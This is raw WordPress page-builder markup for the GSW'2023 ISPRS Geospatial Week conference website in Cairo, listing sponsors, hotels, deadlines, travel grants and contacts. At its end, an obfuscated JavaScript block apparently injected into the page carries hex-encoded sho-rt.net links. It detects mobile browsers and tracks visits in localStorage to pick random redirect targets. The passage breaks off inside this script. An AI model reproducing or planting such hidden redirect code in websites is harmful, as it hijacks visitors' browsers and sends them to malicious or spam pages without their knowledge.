wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 